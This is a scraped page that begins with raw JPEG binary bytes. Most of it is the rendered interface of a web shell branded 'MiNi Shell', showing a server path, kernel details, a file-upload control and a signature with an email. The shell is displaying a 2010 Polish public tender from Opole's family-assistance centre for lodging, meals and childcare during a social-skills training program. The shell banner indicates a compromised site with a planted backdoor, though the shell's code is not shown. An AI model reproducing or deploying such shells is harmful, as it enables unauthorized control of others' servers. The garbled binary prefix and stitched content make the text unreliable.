JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/124561-N-2010.html

<p class="kh_header"><b>Opole: Usługi noclegowe, wyżywienia oraz  rekreacyjne i opiekuńcze dla uczestników treningu kompetencji i umiejętności społecznych organizowanego przez Miejski Ośrodek Pomocy Rodzinie w Opolu</b><br>
<b>Numer ogłoszenia: 124561 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Opolu , ul. Armii Krajowej 36, 45-071 Opole, woj. opolskie, tel. 077 4005950, faks 077 4005952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi noclegowe, wyżywienia oraz  rekreacyjne i opiekuńcze dla uczestników treningu kompetencji i umiejętności społecznych organizowanego przez Miejski Ośrodek Pomocy Rodzinie w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

1.   Zapewnienie bazy noclegowej, wyżywienia oraz usług rekreacyjnych i opieki nad dziećmi dla uczestników wyjazdowego 7 dniowego treningu kompetencji i umiejętności społecznych realizowanego w ramach Programu aktywizacji społeczno - zawodowej bezrobotnych i nieaktywnych zawodowo klientów Miejskiego Ośrodka Pomocy Rodzinie w Opolu, pn.: MOJA PRACA - MOJA PRZYSZŁOŚĆ realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

2. Wyjazdowy trening kompetencji i umiejętności społecznych odbędzie się na terenie województwa opolskiego  w okolicach Pokrzywnej, Głuchołaz, Jarnołtówka.
 
3. Planowana liczba uczestników: 130 uczestników  dorosłych + ok. 50 dzieci w wieku od  0,5 roku do 17 lat oraz  2 psychologów + 3 pracowników socjalnych.
Uczestnicy będą podzieleni na 8 grup warsztatowych ( po ok. 16 - 17 uczestników dorosłych ), tj: 
5 grup uczestników dorosłych, 1 grupa uczestników dorosłych niepełnosprawnych ( w tym 1 osoba poruszająca się na wózku) oraz  2 grupy uczestników dorosłych z dziećmi  ( po ok. 25 dzieci na grupę).
Wykaz rodzin  - uczestników podany jest w załączniku do SIWZ.

4. Termin realizacji treningu - czerwiec - lipiec 2010r. 
Warsztaty (każdy turnus) będą trwały przez  7 dni - od niedzieli ( przyjazd na obiad) do soboty
( wykwaterowanie po śniadaniu i wyjazd na wycieczkę). 

5. Wykonawca zapewni pobyt uczestników  7 dniowego treningu na 4 turnusach:
  -  turnus I -      1 grupa  uczestników dorosłych  - ok. 16 osób + 1 grupa osób niepełnosprawnych -  
                           ok. 20 os. + 2 psychologów + 3 pracowników socjalnych - łącznie: ok. 41 osób dorosłych, 

  -  turnus II -      2 grupy warsztatowe  uczestników dorosłych - po ok. 16 os.  + 2 psychologów  
                            + 3 pracowników socjalnych - łącznie: ok. 37 osób dorosłych, 
  -  turnus III -   1 grupa warsztatowa  uczestników dorosłych - ok. 15 os. + 1 grupa uczestników dorosłych
                            z dziećmi - ok 16 os. dorosłych + ok. 25 dzieci + 2 psychologów + 3 pracowników 
                            socjalnych - łącznie: ok 36 os. dorosłych + 25 dzieci =  ok. 61 uczestników. 
  -  turnus IV-    1 grupa warsztatowa  uczestników dorosłych - ok. 15 os. + 1 grupa uczestników dorosłych
                            z dziećmi - ok 16 os. dorosłych + ok. 25 dzieci + 2 psychologów + 3 pracowników 
                            socjalnych - łącznie: ok 36 os. dorosłych + 25 dzieci =  ok. 61 uczestników. 

6. Podczas wyjazdowego 7 dniowego treningu kompetencji i umiejętności społecznych Wykonawca usług winien zapewnić:

1)	Dojazd i powrót wszystkich uczestników treningu i opiekunów z Opola do miejscowości, w której znajduje się baza noclegowa - autobus wyjazd w niedzielę w godz. dopołudniowych, powrót w sobotę po wycieczce, w godz. popołudniowych.

2)   Ubezpieczenie NW uczestników treningu  i opiekunów na okres pobytu i transportu.

 3)   Zakwaterowanie przez 7 dni x 4 turnusy:  wszyscy uczestnicy  treningu, opiekunowie będą
zakwaterowani w ośrodku wypoczynkowym, pensjonacie, hotelu, itp., przystosowanym na potrzeby osób    niepełnosprawnych - w jednym ośrodku / budynku, w pokojach  1 - 4 osobowych z pełnym węzłem sanitarnym (istnieje możliwość dostawek dla dzieci).
Zakwaterowanie nastąpi w niedziele przed obiadem, wykwaterowanie w soboty po śniadaniu.

4)   Sale wykładowe - min. 2, umożliwiające     przeprowadzenie zajęć grupowych ( dla 20 osób każda) -
      w  budynku bazy noclegowej lub w pobliżu budynku, wyposażone w stoły, krzesła oraz sprzęt 
      multimedialny - rzutnik,    ekran, komputer lub laptop do podłączenia rzutnika.  
      Zajęcia w ramach treningu będą odbywały się od poniedziałku do piątku  przez 5 godz. dziennie. 

5)  Wyżywienie dla uczestników i opiekunów: 4 posiłki dziennie: śniadanie + obiad  z  deserem +
      kolacja + serwis kawowy ( kawa, herbata, woda, soki  i słodka przekąska -kruche 
     ciasteczka lub drożdżówka / pączek podczas przerwy w zajęciach grupowych), a dla dzieci drugie
     śniadanie.
     W przypadku dzieci posiłki należy dostosować do wieku dziecka. 
     Wyżywienie dla każdego turnusu należy zapewnić od obiadu w niedzielę do śniadania w sobotę + 
     obiad w czasie sobotniej wycieczki. 

6)  Opiekę nad dziećmi uczestników treningu podczas zajęć grupowych przez min. 5, 5 godz. dziennie 
     ( w godz. 8,45 - 14,15)-  dotyczy turnusu  III i IV. 
     Wykonawca zapewni odrębne pomieszczenie - świetlicę dla dzieci wyposażoną w stoliki, 
     krzesełka, telewizor + video, gry świetlicowe, zabawki, materiały plastyczne (bloki,  kredki, pisaki,
     farby, plastelina, klej, papier kolorowy, wycinanki, itp).
     Wykonawca zapewni możliwość korzystania z placu zabaw na terenie obiektu lub w pobliżu.
     Wykonawca zapewni min. 3 opiekunów na każdą grupę dzieci, z których min. 1 osoba winna 
     posiadać uprawnienia pedagogiczne  i co najmniej  2 letnie doświadczenie w pracy z 
    dziećmi,  a także posiadać aktualne ubezpieczenie  OC.
     Turnusy z udziałem dzieci planowane są po zakończeniu roku szkolnego.

7) Opiekę medyczną doraźną - w razie potrzeby możliwość wizyty lekarskiej oraz odpowiednio
    wyposażoną  w środki opatrunkowe apteczkę pierwszej pomocy.

8)  Organizacja czasu wolnego na każdym turnusie:
-	2 spotkania integracyjne z muzyką i tańcem - zapoznawcze i pożegnalne, z ciepłym posiłkiem i  serwisem kawowym ( kawa, herbata, woda, soki, ciasta typu sernik, tortowe),
-     1 spotkanie integracyjne przy ognisku z pieczeniem kiełbasy,
-	1 wycieczka autokarowa do atrakcyjnej turystycznie miejscowości, zwiedzanie lokalnych atrakcji  turystycznych  ( od 10 do 50 km).
Wycieczka  odbędzie się w sobotę, w dniu wyjazdu - po śniadaniu i wykwaterowaniu.
Podczas wycieczki Wykonawca winien zapewnić obiad, zwiedzanie atrakcji turystycznych. 
-	1 wycieczka autobusowa do pobliskiego aqua parku / na basen a w razie braku odpowiedniej pogody do atrakcyjnych turystycznie i rekreacyjnie miejsc.
-	piesze wycieczki krajoznawcze, udział w lokalnych atrakcjach turystycznych - do 3 godzin,
-	zajęcia świetlicowe, gry i zabawy integracyjne i sportowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-1, 92.00.00.00-1, 85.31.21.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania.
Opis sposobu dokonywania oceny spełniania tego warunku:  
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia Wykonawcy.
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia.
Opis sposobu dokonywania oceny spełniania tego warunku:  
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się:

-  wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie    co najmniej 2 usług hotelarsko - gastronomicznych  dla co najmniej 40 osób o  łącznej wartości co najmniej 20.000,00 zł brutto każda,  polegających na udostępnieniu bazy noclegowej i gastronomicznej na cele szkoleń, konferencji, wycieczek, wczasów, zielonych szkół, kolonii, itp.

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia-nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym. 
	Opis sposobu dokonywania oceny spełniania tego warunku:  
	Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się: 
-   dysponowaniem  bazą noclegową i zapleczem gastronomicznym na terenie województwa
    opolskiego  w okolicach Pokrzywnej, Głuchołaz, Jarnołtówka, dla co najmniej 65 osób w pokojach
	    1 - 4 osobowych  i 2 salami konferencyjnymi dla 20 osób każda wyposażonymi w urządzenia 
	    multimedialne oraz 1 świetlicą wyposażoną w sprzęt RTV i gry świetlicowe,
	
	   Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia-nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:  
	Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się: 

 -  dysponowaniem co najmniej 1 osobą posiadającą przygotowanie pedagogiczne, która wykaże się 
	      co najmniej 2 letnim doświadczenie w pracy z dziećmi i aktualnym  ubezpieczeniem od 
	      odpowiedzialności cywilnej. 
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnianie -spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:
1.Zmiany przepisów prawnych mających wpływ na realizację umowy, a w szczególności na jej zakres i termin.
2. Zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany podatku VAT, wprowadzenia akcyzy.
3. Zmiany wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej.
4. Zmiany umowy pomiędzy Zamawiającym a instytucjami nadzorującymi realizację projektu,
w ramach którego realizowane jest zamówienie.
5. Wyniknięcia rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób 
a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu
jednoznacznej interpretacji jej zapisów przez Strony.
6. Zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Opolu
ul. Armii Krajowej 36    45-071 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Opolu
ul. Armii Krajowej 36    45-071 Opole
pok. 25 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Umowa współfinansowana przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com